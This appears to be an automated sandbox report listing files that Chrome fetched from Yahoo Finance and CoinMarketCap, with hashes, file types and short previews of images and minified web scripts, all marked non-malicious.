                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://s2.coinmarketcap.com/static/img/coins/64x64/5994.png
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:.PNG........IHDR...@...@.............gAMA......a.....sRGB.........PLTELiq............. ....\.................... .....4..."...)...F.................m..H..~...........x..O.....e...O@.......$.|.....$...................Y.......C......b.....zYV...........).1....,../.......(.3.9".5..9.,.?(.D.*.....#.....D-......&.!......."..].=.I3.M9....J.....'...,....."..!..7.. ...O."..f...8...}.(..+....1........)..*...7..v........."..%......T.?&....[7.....n.8.~=.7*....%.....%..S>..?..=.@4......."...........i\..............2 ./$..E........FFD.o9.................f............"....C:...7...2...J1.,!.e6.6.#.....;WWW.........t\6R:.....~......|.,..)..YA.XA.E9..k.QJ>>=..R.....vE1.....s.ni.,....xr..9.D;.t>.W>.*..Zklk1(....{U..~.O.+..f..(._..~!.!...._|B,...NE.:...^/(e...a\.qF....H<.2%.G<.8...Z.."eF..b.t......Ud<....tRNS..............'.2...=v....{K....h..o.8..\.......^....................................................................................................
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:Java source, ASCII text, with very long lines (835)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):836
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.244889614431222
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:12:K5mEpqLCTg1QiMWHWzRiad9UHVU3vMIMceTS2zJ8tYqYfJii9STxoI4hEy84IVvn:ymEi1Q9NliocV33bTuVikNwwVvn
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:D5BC696E4C1A7A24A20AFF3D33F6285D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:67D20FB0576C1ED36CB6805F7E62E8358F8271D6
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:FC093D2D88E49E9968C3CDB4513C2997F63322D270C7A68CD36791664BF43847
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:DDE060CE2EE9F5898024978A2DA4E63F6CD0B4974F49F93DA1B549A4D77D924A225F858B230227F53B0BDA25B39E9075B053B470929A72AFBDCF18448455E0CB
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:import{s as c}from"./scheduler.Dr9AAxFe.js";import{S as s,i as m,c as f,b as p,m as u,t as _,a as l,d as g}from"./index.DCSmZEjO.js";import{T as k,L as b,F as i}from"./twitter-x-round.YxAnOas2.js";import{I}from"./Icon.BSWt_jx8.js";function d(a){let n,e;return n=new I({props:{icon:a[0],size:"xx-large",type:"primary"}}),{c(){f(n.$$.fragment)},l(t){p(n.$$.fragment,t)},m(t,o){u(n,t,o),e=!0},p(t,[o]){const r={};o&1&&(r.icon=t[0]),n.$set(r)},i(t){e||(_(n.$$.fragment,t),e=!0)},o(t){l(n.$$.fragment,t),e=!1},d(t){g(n,t)}}}function w(a,n,e){let{variant:t}=n,o=i;return a.$$set=r=>{"variant"in r&&e(1,t=r.variant)},a.$$.update=()=>{if(a.$$.dirty&2)switch(t){case"facebook":e(0,o=i);break;case"linkedin":e(0,o=b);break;case"twitter":e(0,o=k);break}},[o,t]}class $ extends s{constructor(n){super(),m(this,n,w,d,c,{variant:1})}}export{$ as S};.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PNG image data, 64 x 64, 8-bit colormap, non-interlaced
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):2671
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.697670766435196
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:48:qDk1z4Gr0Oc3BTxrY0S9sfNq9IzcsGu+qd0USYw4E0VQd8Qs/7:qIKGIOUFrGesIiuXWUe4EmT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:8E26118D7A63338CFEF1116720C92E0E
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:8902985FAA4DB767EA26150E0058886B8874FB37
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:A0ED329B8CD852688196EA87F4496585AEB0047C57B1FADBFC87F7BB8B9CADA6
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:D5137311B25651141F093713BA390FBF9403398C35ED1F1178A95A99101DDBDCC4791B7CB60E7F39D7CB8216C9B5A65EA6AB02E61730D398C6BC805F8EFBBC49
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://s2.coinmarketcap.com/static/img/coins/64x64/4943.png
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:.PNG........IHDR...@...@.............gAMA......a.....sRGB.........PLTELiq..#.1..8..1..S..J....................J.....O..0..+.....E..$..U..P.....'..<.....H.....J........B..D.....N...........?..C..S..V.....3..W..V..<..O...........L.....I..M.....R..F..B.....S..F..R..N..#.."..#..G..B.....$..A.....W..@..%.....0..V...........6..&........>..'..,..*..)..;..,..8.....=.....W..W..Z..W........A..N..H.....=.....&.....K.....I.....L.....M..0.."..*...........G..D.. ..@.....2..E..!..$..+..P..4..)..:..,..5..C..D..%..2..?..=..(..6..P..9..1..:.....0..R....e..R..*.. ..8..!.....-..^..o.....S.....;.....$.....S.....V..Y..!..g.....c..S..,..X..=..A..O..M..a.....T....[..J..&........T..j..I........,..C..v........D...........Q.....E..r..........9..0..Y..<.........7........".....C..2.....(..7..1.....V..|..C.....X...............X..Z.....z....W...\......tRNS......................e,....g..........+..............1.p.r..r1.p....||..|..|.C....bAA..bb...C.-.................................IDATX..w\.g.._
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):42
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):2.9881439641616536
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:CUXPQE/xlEy:1QEoy
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:D89746888DA2D9510B64A9F031EAECD5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:D5FCEB6532643D0D84FFE09C40C481ECDF59E15A
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:EF1955AE757C8B966C83248350331BD3A30F658CED11F387F8EBF05AB3368629
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:D5DA26B5D496EDB0221DF1A4057A8B0285D15592A8F8DC7016A294DF37ED335F3FDE6A2252962E0DF38B62847F8B771463A0124EF3F84299F262ED9D9D3CEE4C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:GIF89a.............!.......,...........D.;
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PNG image data, 1 x 1, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):170
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.335916817166796
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:yionv//thPlE+tnM5OCAadCmy42/uDlhlbGlo+4/iRXTECLrlxyxtyaC/tIlsg1B:6v/lhPfZMQC19s/6TdKXTECL6yR/iVB
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:E7673C60AF825466F83D46DA72CA1635
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:FC0FCBEE0835709BA2D28798A612BFD687903FB5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:0B8A20373C6DD04E091902226D922B3688143A8938AFB9D283D889DE7B55CEB5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:F1C33E72643CE366FD578E3B5D393799E8C9EA27B180987826AF43B4FC00B65A4EAAE5E6426A23448956FEE99E3108C6A86F32FB4896C156E24AF0571A11C498
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:.PNG........IHDR....................bKGD..............pHYs.................tIME......-Q.7n....tEXtComment.Created with The GIMP.d%n....IDAT..c.iy......+........IEND.B`..
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (557)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):558
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):4.593867408725143
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:12:eR10My84ELsxmNvRwQyRj6LFXRFNLI9hU0LXE8IFAak:q10Mh45Mwb2xBPI9CEIFAak
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:B1F394C472BEB3ED175AECA5299FDF8E
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:550BEAB0DACAE6ED62C5D773B855865BFBEF4EE3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:BE22B8C042BBF394E7B9F6EAC022629D9BEA9C22A88B6631B13ED50372B84F1A
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:485897C7EC9A691C86DBBC925C1CA748EF445BD58615B7C9CFFD9D5C371CDC5C0C15CF97F80609CA8B51FA8534AF0277583C7F9BA1C696662B66DA9129D62689
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:const c='<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24"><path fill-rule="evenodd" d="M17 6v4h1.08c.672 0 1.008 0 1.265.13a1.2 1.2 0 0 1 .524.525c.131.257.131.593.131 1.265v8.16c0 .672 0 1.008-.13 1.265a1.2 1.2 0 0 1-.525.524c-.257.131-.593.131-1.265.131H5.92c-.672 0-1.008 0-1.265-.13a1.2 1.2 0 0 1-.524-.525C4 21.088 4 20.752 4 20.08v-8.16c0-.672 0-1.008.13-1.265a1.2 1.2 0 0 1 .525-.524C4.912 10 5.248 10 5.92 10h9.18V6c0-1.71-1.39-3.1-3.1-3.1-1.36 0-2.518.88-2.935 2.1H7.1A5.002 5.002 0 0 1 17 6" clip-rule="evenodd"/></svg>';export{c as l};.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:Java source, ASCII text, with very long lines (1569)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):1570
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.274142682137631
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:48:VfVLCd7Eb0s2AsG9Z4ebZTPG9b9+ZFSnoEncaA:VfV675s2AsGHt4gSnoEcaA
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:ACD3DD554A813380A0F12686B6150495
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:79B1DE18ABE3E1A9647CB5CD075DD96410E310D3
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:AD434581BF26578109BF6D7AC2375E342F2101D8ABCD1C95633C2FD0528306C0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:703F1E67F220E3D32F87071F53CEC4E426B28528F5D817397103D304813CB1260037058039573BAB6899318420723BEE67257342C3B84D4A7AE5947963FEAD62
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://finance.yahoo.com/assets/_app/immutable/chunks/InfiniteScroll.Bb79EfyN.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:import{s as w,e as y,d as C,f as D,i as H,k as I,n as d,O as T,I as W,P as b}from"./scheduler.Dr9AAxFe.js";import{S as q,i as v}from"./index.DCSmZEjO.js";function z(s){let t;return{c(){t=y("li")},l(i){t=C(i,"LI",{}),D(t).forEach(H)},m(i,l){I(i,t,l),s[6](t)},p:d,i:d,o:d,d(i){i&&H(t),s[6](null)}}}function x(s,t,i){let{threshold:l=0}=t,{elementScroll:r=void 0}=t,{hasMore:a=!0}=t,{useWindow:c=!1}=t,{isLoading:h}=t;const u=T();let o;function f(e){var g,m,S;if(h)return;const n=c?e.target.documentElement||((g=e.target.document)==null?void 0:g.documentElement):e.target;if(n){const L=(m=n.querySelector(".layoutContainer .mainContainer"))==null?void 0:m.offsetHeight,E=(S=n.querySelector(".layoutContainer > .right .dock"))==null?void 0:S.offsetHeight,_=n.scrollHeight-n.clientHeight-n.scrollTop;if(E>L){const k=E-L;n.scrollHeight-k-n.clientHeight-n.scrollTop<=l&&a&&u("loadMore")}else _<=l&&a&&u("loadMore")}}W(()=>{let e;return(o||r||c)&&(e=c?window:r||(o==null?void 0:o.parentNode),e==null||e.addEve
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PNG image data, 64 x 64, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):654
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.3985411335331275
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:12:6v/7lGSMzlNR1G0Et5h5h5h5vHmbocTz4Mfh9O6f/KkwB/lY0kIyjNEpvaHVoBwX:l/DQNm4OeS7w3zujFHuBwea
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:9AC67F24996A6DC3F291AC986647921D
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:5BBB5DAB3FE91A7EFD2C645C21E4C0E7EB9A0091
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:43F77BC6963025A15B474A6591E18E3776A165A5806EF0C0A5444A154159EF54
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:F723448866B4189FF81C00375728C70E7982B8B00AFCA051D8F8D2190C2A85B9ABF45C5D89AECBAE36142BC801E0CF6A5A1FF53939EB79406841CBF20FA52BA6
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://s2.coinmarketcap.com/static/img/coins/64x64/11419.png
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:.PNG........IHDR...@...@......iq....UIDATx^.?jWA.F...Zp#.@..r.b.p..vVb..7.......D..4Bd.....f..{3.{..9..?.KHrq...]h%DSB4%DSB4%DSB4%DSB4%DSB4%....mR..l..nR.t<x..^..QU.It....C.p..<x..A.N.|..w...W...\~.#.h.....N...*....N...*....%...*....p<..g.eg!.^.;..6.~...$..;....i.....@.p^.....Z#|.UB....$.........>.*.Q.....8In...^..Jh...')...-.yY%....Jj............:.C..ng..GU.;up......W.s.H{.v..v..Ni......6+....v9..%.sH..%..........&;..pP.w...n'...J..S.'..E..t.vj..w.(....4K.....G......Ii....wSBG..Y.'x.J.,..)....]K.~.0@..+a.{.}.(a....aJ..Vx.P%.t+.n...[...0...........%L........[...I..)!...)!...)!...)!...)!...)!...)!...O.,n.=.H....IEND.B`.
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (2074), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):2074
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.260719431857589
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:48:CEUG4rNVxugJTY7rRKLNqpH7q7HwDOq7br2yOuQ6qh:CdrNV0gVWvbq7eOq72yOdh
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:93D5BB91C9A48C4EDBC164A65354B00C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:EA8D8A5F20B4061A7581135B465F7D81F431390C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:E17075CF2F747253CB3C737891BE0F417B8F4330DDAB9D53013BDD4EBCA568EE
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:3F0F5D520F75A443304ED277F73F050698029942A1A01B9B65A8F0D38846B7DFA04D126685A75436BC3534D94DD0C9B1BCCC6DB2C628C58FF74453FA92FD9D22
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:!function(){var n="tsdtocl",e="!-#@",t="ul",i="https:",o=atob("aHR0cHM6Ly90c2R0b2NsLmNvbQ=="),r={},a=i,d=-1,c,u;try{var s=function n(e){r[e.id]&&(r[e.id](e),delete r[e.id])},w=function e(t){var i;try{i=JSON.parse(t.data)}catch(n){}i&&i.namespace===n&&s(i)},f=function e(t,i,o,a){if(c){r[++d]=a;var u={namespace:n,id:d,action:t,key:i,value:o};return c&&c.contentWindow&&c.contentWindow.postMessage(JSON.stringify(u),"*"),u}},l=function n(e){for(var t="".concat(e,"="),i=document.cookie.split(";"),o=0;o<i.length;o++){for(var r=i[o];" "===r.charAt(0);)r=r.substring(1);if(0===r.indexOf(t))return r.substring(t.length,r.length)}return""},g=function n(e,t,i){return f("append",e,t,i)},p=function n(t){if(t&&"string"==typeof t&&-1!==t.indexOf(e)){var i=new Image;return i.src="".concat(a,"//trc.taboola.com/sg/taboola-ifs/1/um/?uils=").concat(encodeURIComponent(t)),i}},m=function n(e){if(e&&e.success){if(e.wasAppended&&e.value)return p(e.value)}else window.__trcDebug&&window.__trcDebug("ifsDebug=".conc
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PNG image data, 64 x 64, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):4251
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):7.929723255143754
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:96:IqQDUBKTuBVrN2Dc4tR/HAwaHEIkVZdBrc2nPatF:IL4cTIB8c4n/HbIegdF
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:AE64499C8825452F6262177EE6DD525B
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:92A35E0817CEFB5BEFBB18422FB4C9D220F6754C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:47FB417F6B72C4EDC08DFB90A376B2C88B3B51992BF3C83DD14E011EDBA2F339
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:1A776374F3C20D16BF0C84DBB28A6CA3D0A110CA928AA87F56D79D09B898091B84F4D3EA164A6C79DB0C9FEDEB66167BD83B854267C2870394F70DC536117441
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:.PNG........IHDR...@...@......iq....bIDATx^.yTTW..s....9s..9=....c.Y..%.IL.m;.I..N.L'.....l.D.Ck4.B#...$QQ .d\@D..(...(.....E.$.....>^...("Iw.....y.........^..a.o.|.H.x1=9...AB....a_.#..o.mK..]...J.....#i.G.%#.O+G..0JOT.....a..c4.|.s....k..Q...M..x...`2..).W...R8....8.....!_./.DO.yc$e...`.J87.!.'..7..M...V...M.g.....p-..7....oz'.......+N....'...h].....-.&.....l.....|g.t|.h].P..y.pa..>F.S...?F........... &.&.;.-=)r....p...*>...[H.i..dJ4....3h.J........C,.I.......'....HZ>R...#[.R......c......,(.F.rfP....@..q.X.r.........].H.>..zf@.F..H.'T.y7.........Y.g...qHM..6q0...k.......\7x....M..?.r...l.m.k<7@L.....]..T.....~..i/..h*.C...a.K.3.S..I.*.M......NfF..Q..c.....&e...iOl8.e>...-.O....|.7 7S.}!.L...2W.MLx....(*.?..o.C...0...m].F.3...1..J........2O..'v....e...X...P....daK`qN4Y.^.S.(..a....G....Ty\Q.g.do4.Z......m.;......8........a..N.......%R....RR..#.:/...a.vVkd.....v[.....v5..P....q...Fy.V.'o..........:mX..:.y.e%L..$..-1..
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:Unicode text, UTF-8 text, with very long lines (64457), with no line terminators
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):67717
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.404608504229257
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:1536:2UI64yjnvD+FnD6Ug0NAohpuGKOGALvCqk8B4B3OYJKnGvK:TzvDAgoqi
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:6EA12FCCBED15820786C87F0B9B67D61
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:0B1945893B1F90112CB7B1615DD751A17F0BE14F
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:CBEEE7DA6CC21D0D3394C55FAB07C9005D10405A505117CB41C2A1B013773B97
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:D06684BA7C541FA5CE2879FAE1632B1996475A3CCE1E7384F396E07010BFC336F2A9A976D07E9A1F97C2620D70B6F465F216E6EDF4243C0245C8FA51772CF072
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:!function(e,t){"object"==typeof exports&&"object"==typeof module?module.exports=t():"function"==typeof define&&define.amd?define("HomepageClient",[],t):"object"==typeof exports?exports.HomepageClient=t():e.HomepageClient=t()}("undefined"!=typeof self?self:this,function(){return function(e){function t(n){if(o[n])return o[n].exports;var r=o[n]={i:n,l:!1,exports:{}};return e[n].call(r.exports,r,r.exports,t),r.l=!0,r.exports}var n=window.webpackJsonpHomepageClient;window.webpackJsonpHomepageClient=function(t,o,i){for(var a,s,c=0,l=[];c<t.length;c++)s=t[c],r[s]&&l.push(r[s][0]),r[s]=0;for(a in o)Object.prototype.hasOwnProperty.call(o,a)&&(e[a]=o[a]);for(n&&n(t,o,i);l.length;)l.shift()()};var o={},r={1:0,2:0};return t.e=function(e){function n(){s.onerror=s.onload=null,clearTimeout(c);var t=r[e];0!==t&&(t&&t[1](new Error("Loading chunk "+e+" failed.")),r[e]=void 0)}var o=r[e];if(0===o)return new Promise(function(e){e()});if(o)return o[2];var i=new Promise(function(t,n){o=r[e]=[t,n]});o[2]=i;v
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:ASCII text, with very long lines (2219)
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):4284
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.3829982210574245
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:96:Y2/W2fYD/ZZzQGWrh8s1AjHNMx9KmSEgJUqEjaJUqEZS+:B8rZZzlIh8s1AjtMx8OuUqEMUqEZS+
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:A77E8C06F771D14E42622A60F5CBEB1E
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:3A74E6EEC579B280931E1A1709169CC616068940
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:AD0C6A74DA2770A56790C46D40F726A93DE91C5A3F335183DFADFBE0C35CF81C
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:92E3EC45FE9AAD0F8F8542ACC91BC470641EB758006A5DFE44D2B855BA8FF79DEF0EEFC68075C3156375AE41FE154DB83011A67C59DC1A2C860C21259CFEC635
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              URL:https://finance.yahoo.com/assets/_app/immutable/chunks/cookieUtil.BnbQC7mo.js
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Preview:import{aa as b}from"./commonUtil.CI22_Irn.js";var s={},p={};/*!. * cookie. * Copyright(c) 2012-2014 Roman Shtylman. * Copyright(c) 2015 Douglas Christopher Wilson. * MIT Licensed. */p.parse=T;p.serialize=O;var F=decodeURIComponent,A=encodeURIComponent,h=/; */,v=/^[\u0009\u0020-\u007e\u0080-\u00ff]+$/;function T(e,n){if(typeof e!="string")throw new TypeError("argument str must be a string");for(var r={},o=n||{},t=e.split(h),a=o.decode||F,i=0;i<t.length;i++){var f=t[i],l=f.indexOf("=");if(!(l<0)){var d=f.substr(0,l).trim(),c=f.substr(++l,f.length).trim();c[0]=='"'&&(c=c.slice(1,-1)),r[d]==null&&(r[d]=U(c,a))}}return r}function O(e,n,r){var o=r||{},t=o.encode||A;if(!v.test(e))throw new TypeError("argument name is invalid");var a=t(n);if(a&&!v.test(a))throw new TypeError("argument val is invalid");var i=e+"="+a;if(o.maxAge!=null){var f=o.maxAge-0;if(isNaN(f))throw new Error("maxAge should be a Number");i+="; Max-Age="+Math.floor(f)}if(o.domain){if(!v.test(o.domain))throw new TypeError("opt
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              File Type:PNG image data, 1 x 1, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Category:downloaded
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Size (bytes):170
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Entropy (8bit):5.335916817166796
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SSDEEP:3:yionv//thPlE+tnM5OCAadCmy42/uDlhlbGlo+4/iRXTECLrlxyxtyaC/tIlsg1B:6v/lhPfZMQC19s/6TdKXTECL6yR/iVB
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              MD5:E7673C60AF825466F83D46DA72CA1635
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA1:FC0FCBEE0835709BA2D28798A612BFD687903FB5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-256:0B8A20373C6DD04E091902226D922B3688143A8938AFB9D283D889DE7B55CEB5
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              SHA-512:F1C33E72643CE366FD578E3B5D393799E8C9EA27B180987826AF43B4FC00B65A4EAAE5E6426A23448956FEE99E3108C6A86F32FB4896C156E24AF0571A11C498
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                              Malicious:false
